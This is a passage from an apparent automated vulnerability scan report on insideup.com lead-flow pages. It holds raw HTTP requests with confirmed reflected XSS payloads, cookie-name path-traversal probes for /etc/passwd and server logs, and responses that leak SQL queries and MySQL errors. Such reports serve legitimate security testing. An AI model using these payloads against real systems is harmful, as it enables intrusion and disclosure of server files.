OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b9ujpggj9nj4131qggkne5mgg6; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005CC)</script>

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005CC)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g30btf2on3prrmcnaf77vbpmj2; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CF)%3C/script%3E

/ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CF)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005CF)</script>

Request

GET /ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005CF)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nfvhh77t7n2gv7mj76vrmen6h1; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/obtm00/

/ppc/leadflow/obtm00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/obtm00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005CD)</script>

Request

GET /ppc/leadflow/obtm00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005CD)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId=80011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 